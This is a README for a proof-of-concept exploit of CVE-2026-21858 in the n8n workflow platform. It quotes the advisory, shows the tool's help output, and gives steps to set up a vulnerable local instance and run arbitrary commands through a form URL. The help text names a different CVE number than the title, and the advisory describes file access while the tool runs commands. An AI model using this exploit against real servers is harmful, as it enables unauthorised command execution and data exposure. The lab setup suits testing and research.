## https://sploitus.com/exploit?id=E9FEB96E-FD28-54FD-8CC2-01E853439E7E
# PoC-CVE-2026-21858
> n8n is an open source workflow automation platform. Versions starting with 1.65.0 and below 1.121.0 enable an attacker to access files on the underlying server through execution of certain form-based workflows. A vulnerable workflow could grant access to an unauthenticated remote attacker, resulting in exposure of sensitive information stored on the system and may enable further compromise depending on deployment configuration and workflow usage. This issue is fixed in version 1.121.0.
[https://nvd.nist.gov/vuln/detail/CVE-2026-21858](https://nvd.nist.gov/vuln/detail/CVE-2026-21858)
## Usage
```
โฏ python CVE-2026-21858.py -h
usage: CVE-2026-21858.py [-h] --command COMMAND form
PoC exploit: CVE-2026-1357
positional arguments:
form Target form URL
options:
-h, --help show this help message and exit
--command COMMAND Command to run on target
```
## Example
This PoC was written against a barebones n8n workflow to mock a simple file conversion flow:
Clone the respository and create a vulnerable docker instance:
```bash
mkdir n8n-data
sudo chown -R 1000:1000 n8n-data
docker-compose up -d
```
Once the instance is created, crete the workflow shown in the above screenshot. For the `Extract from File` step, you'll need to set `On Error` setting to `Contine` to allow the workflow to complete. Additionally, set the flow to `Active` in the toolbar.
After creating the flow, install the requirements and launch the exploit:
```bash
pip install -r requirements.txt
python CVE-2026-21858.py http://localhost:5678/form/1d6de4f6-23dc-4163-ad39-a69252189d5e --command "uname -a"
```
---
This project is provided for educational and research purposes only. The author is not responsible for misuse or damage caused by this code.